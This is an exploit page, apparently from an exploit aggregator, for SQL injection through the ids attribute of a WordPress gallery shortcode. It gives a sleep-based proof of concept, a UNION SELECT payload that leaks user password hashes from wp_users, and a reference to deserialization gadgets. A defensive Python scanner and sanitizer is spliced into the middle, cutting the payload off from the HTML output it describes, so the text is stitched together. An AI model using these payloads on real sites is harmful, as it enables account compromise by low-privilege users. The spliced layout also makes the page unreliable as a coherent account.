## https://sploitus.com/exploit?id=WPEX-ID:08DBE202-0136-4502-87E7-5E984DC27B16
Simple PoC to prove the SQLi: add the following shortcode in a page/post with a role as low as contributor, then preview/view it and note the 10s delay

[gallery layout="cascade" ids="1) AND (select*from(select(sleep(10)))a"]

-- Reporter PoC:

This SQL injection allows two things: 1) disclosure of arbitrary contents in SQL tables, and 2) deserialization of arbitrary objects.

To prepare for data disclosure, we first need to get the serialized version of _wp_attachment_metadata. Of course, if you are here for deserialization, this can be replaced with serialization gadgets.

This is the JSON I used for this:

{"width":1,"height":1,"file":"a.png","sizes":{"medium":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"},"thumbnail":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"}},"image_meta":{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0","keywords":[]}}

b64 = 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

This can be run through base64_encode(serialize(json_decode(PAYLOAD))) to get the serialized payload.

Shortcode payload for leaking user's password hashes:
[gallery layout="cascade" ids="1) UNION SELECT id,user_pass,FROM_BASE64('BASE64ED_PAYLOAD_SEE_ABOVE') FROM wp_users WHERE id IN (1,2,3,4"]
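For defenders, the point of the PoC above is that the `ids` attribute of the shortcode reaches the query unsanitized: a legitimate value is a comma-separated list of attachment IDs, while the injected values contain parentheses and SQL keywords. The following is an added example (not part of the reporter's PoC or the plugin's code) that scans post content for `[gallery]` shortcodes whose `ids` attribute is not a plain integer list, and shows the kind of reduction that WordPress's own `wp_parse_id_list()` performs, which is the fix shape for this class of bug. The sample post bodies are constructed for the example; the first one is benign, the next two reuse the shapes shown on this page.

```python
import re
from typing import List, Tuple

# Constructed sample post bodies (not real site data): one benign use of the
# shortcode, two injected forms like those above, and one with no gallery.
SAMPLE_POSTS: List[Tuple[str, str]] = [
    ("post-1", 'Holiday photos [gallery layout="cascade" ids="12,13,14"]'),
    ("post-2", '[gallery layout="cascade" ids="1) AND (select*from(select(sleep(10)))a"]'),
    ("post-3", "[gallery ids=\"1) UNION SELECT id,user_pass,FROM_BASE64('x') FROM wp_users WHERE id IN (1,2,3,4\"]"),
    ("post-4", "No gallery here."),
]

# A [gallery ...] shortcode and its attribute list (hypothetical, minimal parser).
SHORTCODE_RE = re.compile(r"\[gallery\b([^\]]*)\]", re.IGNORECASE)
# key="value" attribute pairs inside the shortcode.
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
# What a well-formed ids attribute looks like: comma-separated integers only.
ID_LIST_RE = re.compile(r"^\s*\d+(\s*,\s*\d+)*\s*$")


def sanitize_ids(raw: str) -> List[int]:
    """Reduce an ids attribute to a list of integers.

    This mirrors the effect of WordPress's wp_parse_id_list(): split on commas
    and keep only the leading integer of each piece, dropping everything else.
    Any SQL fragment smuggled into the attribute is discarded before it can
    reach a query.
    """
    ids: List[int] = []
    for piece in raw.split(","):
        m = re.match(r"\s*(\d+)", piece)
        if m:
            ids.append(int(m.group(1)))
    return ids


def find_suspicious_galleries(content: str) -> List[str]:
    """Return the ids attribute values of gallery shortcodes that are not a
    clean integer list. Such values are what a detection rule or a pre-save
    content audit should flag."""
    findings: List[str] = []
    for m in SHORTCODE_RE.finditer(content):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        ids = attrs.get("ids")
        if ids is None:
            continue
        if not ID_LIST_RE.match(ids):
            findings.append(ids)
    return findings


def scan_posts(posts: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Scan (post_id, body) pairs and return (post_id, offending_ids) tuples."""
    return [
        (post_id, ids)
        for post_id, body in posts
        for ids in find_suspicious_galleries(body)
    ]


if __name__ == "__main__":
    for post_id, ids in scan_posts(SAMPLE_POSTS):
        print(f"{post_id}: suspicious ids attribute {ids!r} -> sanitized to {sanitize_ids(ids)}")
```

Run against a dump of `wp_posts.post_content`, this flags the two injected posts and leaves the benign gallery alone; the sanitizer output shows why casting the attribute to an integer list (rather than concatenating it into SQL) removes the injection entirely.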


This should produce HTML like the following (the value is base64-encoded):
<div class="mgl-row mgl-layout-1-o" data-cascade-layout="o"><div class="mgl-box a"><figure class="mgl-item">
	<div class="mgl-icon">
		<div class="mgl-img-container">
		</div>
	</div>
	<figcaption class="mgl-caption">
		<p>LEAKED PASSWORD HASH/</p>
	</figcaption>
</figure>
</div></div>